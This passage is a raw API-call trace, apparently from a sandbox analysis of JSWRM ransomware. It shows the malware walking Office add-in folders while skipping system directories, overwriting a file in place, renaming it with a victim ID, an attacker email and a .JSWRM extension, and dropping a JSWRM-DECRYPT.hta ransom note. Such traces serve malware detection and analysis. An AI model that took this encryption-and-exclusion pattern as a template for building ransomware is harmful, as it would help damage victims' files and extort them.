lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="..") returned 1 [0125.099] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="...") returned 1 [0125.099] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="windows") returned -1 [0125.099] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="recovery") returned -1 [0125.099] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="perflogs") returned -1 [0125.099] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="documents and settings") returned 1 [0125.099] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.099] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="system volume information") returned -1 [0125.099] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="msocache") returned -1 [0125.099] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0125.099] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0125.099] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0125.099] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dde8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0125.099] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0125.099] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0125.099] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x20d920, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0125.099] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeff0bc27, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeff0bc27, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xeff31e88, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4eb8, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0125.099] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2=".") returned 1 [0125.099] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="..") returned 1 [0125.099] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="...") returned 1 [0125.099] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="windows") returned -1 [0125.099] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="recovery") returned -1 [0125.099] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="perflogs") returned -1 [0125.099] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="documents and settings") returned 1 [0125.099] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.099] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="system volume information") returned -1 [0125.099] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="msocache") returned -1 [0125.099] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224d50 [0125.099] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0125.099] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0125.099] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dde8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0125.100] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0125.100] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0125.100] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dba8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0125.100] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x15bbd5ad, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x15bbd5ad, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x15cc8628, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4f281, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="PowerViewRes.pt.xap", cAlternateFileName="POWERV~1.XAP")) returned 1 [0125.100] lstrcmpiW (lpString1="PowerViewRes.pt.xap", lpString2=".") returned 1 [0125.100] lstrcmpiW (lpString1="PowerViewRes.pt.xap", lpString2="..") returned 1 [0125.100] lstrcmpiW (lpString1="PowerViewRes.pt.xap", lpString2="...") returned 1 [0125.100] lstrcmpiW (lpString1="PowerViewRes.pt.xap", lpString2="windows") returned -1 [0125.100] lstrcmpiW (lpString1="PowerViewRes.pt.xap", lpString2="recovery") returned -1 [0125.100] lstrcmpiW (lpString1="PowerViewRes.pt.xap", lpString2="perflogs") returned 1 [0125.100] lstrcmpiW (lpString1="PowerViewRes.pt.xap", lpString2="documents and settings") returned 1 [0125.100] lstrcmpiW (lpString1="PowerViewRes.pt.xap", lpString2="$RECYCLE.BIN") returned 1 [0125.100] lstrcmpiW (lpString1="PowerViewRes.pt.xap", lpString2="system volume information") returned -1 [0125.100] lstrcmpiW (lpString1="PowerViewRes.pt.xap", lpString2="msocache") returned 1 [0125.100] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0125.100] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.pt.xap", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0125.100] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0125.100] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.pt.xap", cchWideChar=19, lpMultiByteStr=0x241290, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerViewRes.pt.xap", lpUsedDefaultChar=0x0) returned 19 [0125.100] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.pt.xap", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0125.100] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0125.100] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.pt.xap", cchWideChar=19, lpMultiByteStr=0x2410d8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerViewRes.pt.xap", lpUsedDefaultChar=0x0) returned 19 [0125.100] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0125.100] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e22c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0125.100] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ea18 [0125.100] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\pt\\PowerViewRes.pt.xap" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\pt\\powerviewres.pt.xap"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0125.101] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e1c0 | out: lpFileSize=0x345e1c0*=324225) returned 1 [0125.101] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0125.101] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24f1e0 [0125.101] ReadFile (in: hFile=0x338, lpBuffer=0x24f1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x24f1e0*, lpNumberOfBytesRead=0x345e1cc*=0x27100, lpOverlapped=0x0) returned 1 [0125.115] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0125.115] WriteFile (in: hFile=0x338, lpBuffer=0x24f1e0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x24f1e0*, lpNumberOfBytesWritten=0x345e1c8*=0x27100, lpOverlapped=0x0) returned 1 [0125.116] CloseHandle (hObject=0x338) returned 1 [0125.116] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22eca0 [0125.116] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0125.116] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0125.116] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0125.116] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0125.116] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\pt\\PowerViewRes.pt.xap" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\pt\\powerviewres.pt.xap"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\pt\\PowerViewRes.pt.xap.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\pt\\powerviewres.pt.xap.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0125.117] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0125.117] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22eca0 | out: hHeap=0x1e0000) returned 1 [0125.117] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ea18 | out: hHeap=0x1e0000) returned 1 [0125.117] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0125.117] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0125.117] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x15bbd5ad, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x15bbd5ad, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x15cc8628, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4f281, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="PowerViewRes.pt.xap", cAlternateFileName="POWERV~1.XAP")) returned 0 [0125.117] FindClose (in: hFindFile=0x232100 | out: hFindFile=0x232100) returned 1 [0125.118] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22df20 | out: hHeap=0x1e0000) returned 1 [0125.118] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0125.118] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0125.118] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf475131d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x15be380c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x15be380c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="pt-PT", cAlternateFileName="")) returned 1 [0125.118] lstrcmpiW (lpString1="pt-PT", lpString2=".") returned 1 [0125.118] lstrcmpiW (lpString1="pt-PT", lpString2="..") returned 1 [0125.118] lstrcmpiW (lpString1="pt-PT", lpString2="...") returned 1 [0125.119] lstrcmpiW (lpString1="pt-PT", lpString2="windows") returned -1 [0125.119] lstrcmpiW (lpString1="pt-PT", lpString2="recovery") returned -1 [0125.119] lstrcmpiW (lpString1="pt-PT", lpString2="perflogs") returned 1 [0125.119] lstrcmpiW (lpString1="pt-PT", lpString2="documents and settings") returned 1 [0125.119] lstrcmpiW (lpString1="pt-PT", lpString2="$RECYCLE.BIN") returned 1 [0125.119] lstrcmpiW (lpString1="pt-PT", lpString2="system volume information") returned -1 [0125.119] lstrcmpiW (lpString1="pt-PT", lpString2="msocache") returned 1 [0125.119] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236018 [0125.119] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0125.119] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0125.119] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bf38 [0125.119] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f848 [0125.119] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bf38 | out: hHeap=0x1e0000) returned 1 [0125.119] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\pt-PT\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\pt-pt\\jswrm-decrypt.hta")) returned 0xffffffff [0125.121] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f848 | out: hHeap=0x1e0000) returned 1 [0125.121] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0125.121] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b424, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0125.121] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0125.121] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24e1d8 [0125.122] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0125.122] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24ffa8 [0125.122] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0125.122] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b8f8 [0125.122] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f720 [0125.122] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b8f8 | out: hHeap=0x1e0000) returned 1 [0125.122] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\pt-PT\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\pt-pt\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0125.124] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0125.124] WriteFile (in: hFile=0x314, lpBuffer=0x345b538*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b504, lpOverlapped=0x0 | out: lpBuffer=0x345b538*, lpNumberOfBytesWritten=0x345b504*=0x230c, lpOverlapped=0x0) returned 1 [0125.125] CloseHandle (hObject=0x314) returned 1 [0125.125] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f720 | out: hHeap=0x1e0000) returned 1 [0125.125] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24ffa8 | out: hHeap=0x1e0000) returned 1 [0125.125] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0125.125] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2363b0 [0125.125] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236240 [0125.125] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0125.125] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bf38 [0125.125] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f3a8 [0125.125] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bf38 | out: hHeap=0x1e0000) returned 1 [0125.125] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\pt-PT\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\pt-pt\\jswrm-decrypt.hta")) returned 0x20 [0125.125] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f3a8 | out: hHeap=0x1e0000) returned 1 [0125.125] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0125.125] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b2b8 [0125.125] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\pt-PT\\*.*", lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf475131d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x15be380c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x413c5932, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName=".", cAlternateFileName="")) returned 0x231d40 [0125.125] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0125.125] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf475131d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x15be380c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x413c5932, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="..", cAlternateFileName="")) returned 1 [0125.125] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0125.125] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0125.125] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf7beb2bc, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf7beb2bc, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x15e45dad, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc46c0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="AdHocReportingExcelClient.dll", cAlternateFileName="ADHOCR~1.DLL")) returned 1 [0125.125] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2=".") returned 1 [0125.125] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="..") returned 1 [0125.125] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="...") returned 1 [0125.126] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="windows") returned -1 [0125.126] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="recovery") returned -1 [0125.126] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="perflogs") returned -1 [0125.126] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="documents and settings") returned -1 [0125.126] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.126] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="system volume information") returned -1 [0125.126] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="msocache") returned -1 [0125.126] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0125.126] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0125.126] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0125.126] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x2410d8, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdHocReportingExcelClient.dll", lpUsedDefaultChar=0x0) returned 29 [0125.126] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0125.126] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0125.126] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0125.126] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0125.126] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x2412b8, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdHocReportingExcelClient.dll", lpUsedDefaultChar=0x0) returned 29 [0125.126] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0125.126] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf0) returned 0x247990 [0125.126] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b2b8 | out: hHeap=0x1e0000) returned 1 [0125.126] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0125.126] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0125.126] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x413c5932, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x413c5932, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x413ecb67, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0125.126] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0125.126] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0125.126] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 